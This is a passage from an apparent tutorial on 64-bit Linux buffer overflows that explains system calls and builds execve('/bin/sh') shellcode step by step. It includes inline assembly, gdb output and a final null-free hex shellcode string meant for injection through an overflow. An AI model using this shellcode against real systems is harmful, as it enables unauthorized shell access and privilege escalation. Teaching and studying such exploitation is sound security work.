Designed by thousands of monkeys with hundreds of typewriters
Buffer Overflows and You
for 64-bit Linux systems!

Shellcode

Well that's all just fantastic. But what if we want to be more malicious than just causing a denial of service? What if we want to root the machine?

Well, since we have control of the return address, if we're careful we should be able to overwrite it to point back at our buffer so when the present function returns, the process executes whatever payload we have in the buffer.

How do we go about generating this payload? Well, you'll have to endure some more explaining first.

We talked briefly in the introduction about how the OS is responsible for managing machine resources and to do so it provides a number of protection mechanisms. Another one of these mechanisms is to have a set of instructions that are considered "privileged." That is, they can only be executed when the CPU is in "supervisor" mode. When userland programs execute, the CPU is not in supervisor mode.

Before we get too far along, it should be noted that this section is loosely based on Aleph One's Smashing the Stack for Fun and Profit. [4] You'll note that the approach taken is a bit different, as is the resulting shell code.

System calls

The only way to enter supervisor mode is to go through predefined entry points in the kernel. One of these points is called a system call. A system call allows a userland program to tell the kernel "Hey, I want you to do something for me or grant me access to some resource."

Let's see how system calls work on x86_64 Linux by taking a look at the kernel source, specifically arch/x86_64/kernel/entry.S where we see the following comment...

/*
 * System call entry. Upto 6 arguments in registers are supported.
 *
 * SYSCALL does not save anything on the stack and does not change the
 * stack pointer.
 */
		
/*
 * Register setup:	
 * rax  system call number
 * rdi  arg0
 * rcx  return address for syscall/sysret, C arg3 
 * rsi  arg1
 * rdx  arg2	
 * r10  arg3 	(--> moved to rcx for C)
 * r8   arg4
 * r9   arg5
 * r11  eflags for syscall/sysret, temporary for C
 * r12-r15,rbp,rbx saved by C code, not touched. 		
 * 
 * Interrupts are off on entry.
 * Only called from user space.
 *
 * XXX	if we had a free scratch register we could save the RSP into the stack frame
 *      and report it properly in ps. Unfortunately we haven't.
 */ 			 		

So to make a system call, you first store the syscall number in RAX, any parameters in RDI, RSI, RDX, etc, and then execute the "syscall" instruction. It's worth noting that this is not how it works on old x86. On i386, the parameters are passed via EBX, ECX, EDX, etc; the syscall number is stored in EAX; and the "int" instruction is executed for interrupt 0x80.

If this seems painful to you, you're not alone. Since most developers get scared when you mention words like "register" and "interrupt," glibc provides wrapper functions for just about every system call. So instead of doing what was described above, you can instead do something like this...

#include <unistd.h>

int main() {
  execve("/bin/sh", NULL, NULL);
}

The program above is interesting to us, because it represents a pretty useful payload in the context of a buffer overflow attack. It will cause the currently running process to execute /bin/sh and give us a shell. With a shell one can do just about whatever they want.

execve() is a system call, or more precisely it is a wrapper function provided by libc that invokes the "execve" system call. When a "regular" C program wants to make a system call it doesn't usually do it directly.

This time, however, we do want to do it directly, because otherwise we would need to know the starting address of the execve wrapper function. It's even possible that the program we're attacking didn't use glibc, and the wrapper function doesn't even exist in the binary. We'll actually talk about this more in the return-to-libc section.

The code

So how do we go about turning the above program into a payload that we can load into a buffer and execute? Let's start by looking at a little assembly...

$ gcc -static -o shell shell.c
$ gdb ./shell
GNU gdb (GDB) Fedora (7.0.1-44.fc12)
Reading symbols from /home/turkstra/shell...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004003d4 <main+0>:    push   %rbp
0x00000000004003d5 <main+1>:    mov    %rsp,%rbp
0x00000000004003d8 <main+4>:    mov    $0x0,%rdx
0x00000000004003dd <main+9>:    mov    $0x0,%rsi
0x00000000004003e2 <main+14>:   mov    $0x46c610,%rdi
0x00000000004003e7 <main+19>:   callq  0x40ad30 <execve>
0x00000000004003ec <main+24>:   leaveq
0x00000000004003ed <main+25>:   retq
End of assembler dump.

Make sure you add -static to the compiler flags, otherwise instead of directly calling execve you'll encounter code for finding it in the shared library. Regardless, let's break this down some...

0x00000000004003d4 <main+0>:    push   %rbp
0x00000000004003d5 <main+1>:    mov    %rsp,%rbp

If you recall from the DoS section, when a function is called a number of things happen. The code above corresponds to main()'s prelude. We can see that RBP, the old stack frame pointer, is pushed onto the stack. Then RBP is updated to point to the new stack frame (the current stack pointer, in RSP). Next space for the local variables would be allocated if there were any, and those variables would be set to their initial values, if provided.

0x00000000004003d8 <main+4>:    mov    $0x0,%rdx
0x00000000004003dd <main+9>:    mov    $0x0,%rsi
0x00000000004003e2 <main+14>:   mov    $0x46c610,%rdi
0x00000000004003e7 <main+19>:   callq  0x40ad30 <execve>

Here we're doing a function call to the execve() function provided by glibc. You can see the three arguments are being passed via RDI, RSI, and RDX. RDI gets the address of /bin/sh, RSI and RDX get NULL. Let's look at execve()...

(gdb) disassemble execve
Dump of assembler code for function execve:
0x000000000040ad50 <execve+0>:  mov    $0x3b,%rax
0x000000000040ad55 <execve+5>:  syscall
0x000000000040ad57 <execve+7>:  cmp    $0xfffffffffffff000,%rax
0x000000000040ad5d <execve+13>: ja     0x40ad61 <execve+17>
0x000000000040ad5f <execve+15>: repz retq
0x000000000040ad61 <execve+17>: mov    $0xffffffffffffffd0,%rdx
0x000000000040ad68 <execve+24>: neg    %eax
0x000000000040ad6a <execve+26>: mov    %eax,%fs:(%rdx)
0x000000000040ad6d <execve+29>: or     $0xffffffffffffffff,%eax
0x000000000040ad70 <execve+32>: retq
End of assembler dump.

Well, the only part of interest is really the first two lines. We can see it doesn't even follow a normal function prelude - because the arguments are already in the correct registers. We simply load the system call number, 59 in decimal, into RAX. We can verify that this is the correct number by having a look at /usr/include/asm/unistd_64.h. Sure enough...

#define __NR_vfork                              58
__SYSCALL(__NR_vfork, stub_vfork)
#define __NR_execve                             59
__SYSCALL(__NR_execve, stub_execve)
#define __NR_exit                               60
__SYSCALL(__NR_exit, sys_exit)

Okay, let's pick and choose what we need for our payload...

mov    $0x0,%rdx
mov    $0x0,%rsi
mov    $(address of "/bin/sh"),%rdi
mov    $0x3b,%rax
syscall

Well that looks pretty simple. The first 3 mov's set up the arguments for execve, the fourth mov puts its syscall number in RAX, and then we execute "syscall" to invoke the kernel.

Not so fast! Presumably we'll include "/bin/sh" as part of the payload. If we do that, though, how can we find its address? We certainly can't hardcode it. There are a number of tricks you can play at this point. Probably the easiest is to simply push "/bin/sh" onto the stack. If you do that, RSP will automatically be updated to point to it. Sounds easy enough, so we end up with...

mov    $0x0,%rdx
mov    $0x0,%rsi
mov    $0x0068732f6e69622f,%rdi
push   %rdi
mov    %rsp,%rdi
mov    $0x3b,%rax
syscall

You can see we load the ASCII string "/bin/sh" into RDI, push it, and then move RSP (which points to the start of our string) into RDI, setting up the first argument for execve.

Well, it would probably be a good idea to test this first. So let's write another simple program...

int main() {
__asm__(
"mov    $0x0,%rdx\n\t"                // arg 3 = NULL
"mov    $0x0,%rsi\n\t"                // arg 2 = NULL
"mov    $0x0068732f6e69622f,%rdi\n\t"
"push   %rdi\n\t"                     // push "/bin/sh" onto stack
"mov    %rsp,%rdi\n\t"                // arg 1 = stack pointer = start of /bin/sh
"mov    $0x3b,%rax\n\t"               // syscall number = 59
"syscall\n\t"
);
}

Compiling and running it...

$ gcc -o go go.c
$ ./go
[turkstra@corellia turkstra]$ exit
$

Sure enough we get a shell. Now let's figure out the actual byte values for this payload...

The payload

$ gdb go
GNU gdb (GDB) Fedora (7.0.1-44.fc12)
Reading symbols from /home/turkstra/go...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400474 <main+0>:	push   %rbp
0x0000000000400475 <main+1>:	mov    %rsp,%rbp
0x0000000000400478 <main+4>:	mov    $0x0,%rdx
0x000000000040047f <main+11>:	mov    $0x0,%rsi
0x0000000000400486 <main+18>:	mov    $0x68732f6e69622f,%rdi
0x0000000000400490 <main+28>:	push   %rdi
0x0000000000400491 <main+29>:	mov    %rsp,%rdi
0x0000000000400494 <main+32>:	mov    $0x3b,%rax
0x000000000040049b <main+39>:	syscall 
0x000000000040049d <main+41>:	leaveq 
0x000000000040049e <main+42>:	retq   
End of assembler dump.
(gdb) x/bx main+4
0x400478 <main+4>:	0x48
(gdb) 
0x400479 <main+5>:	0xc7
(gdb) 
0x40047a <main+6>:	0xc2
(gdb) 
0x40047b <main+7>:	0x00
(gdb) 
0x40047c <main+8>:	0x00
(gdb) 

Hold up a second... we can't have 0x00's in our string, because a lot of the time we'll be trying to exploit strcpy() or something similar, and it will stop when it encounters a NULL! Let's refactor our code a little bit.

We can get 0x00's by xor'ing things with itself, and we can replace bytes that are 0 with something else, and then use left and right shifts to turn them back into 0's. So, we can turn our code above into this...

int main() {
__asm__(
"xor    %rdx,%rdx\n\t"                // arg 3 = NULL
"mov    %rdx,%rsi\n\t"                // arg 2 = NULL
"mov    $0x1168732f6e69622f,%rdi\n\t"
"shl    $0x8,%rdi\n\t"                
"shr    $0x8,%rdi\n\t"                // first byte = 0 (8 bits)
"push   %rdi\n\t"                     // push "/bin/sh" onto stack
"mov    %rsp,%rdi\n\t"                // arg 1 = stack ptr = start of /bin/sh
"mov    $0x111111111111113b,%rax\n\t" // syscall number = 59
"shl    $0x38,%rax\n\t"         
"shr    $0x38,%rax\n\t"               // first 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}

Okay, now if we go back into gdb and get the values, when it's all said and done we end up with this...

\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08
\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1
\xe0\x38\x48\xc1\xe8\x38\x0f\x05

So now we have glorious 64-bit shellcode.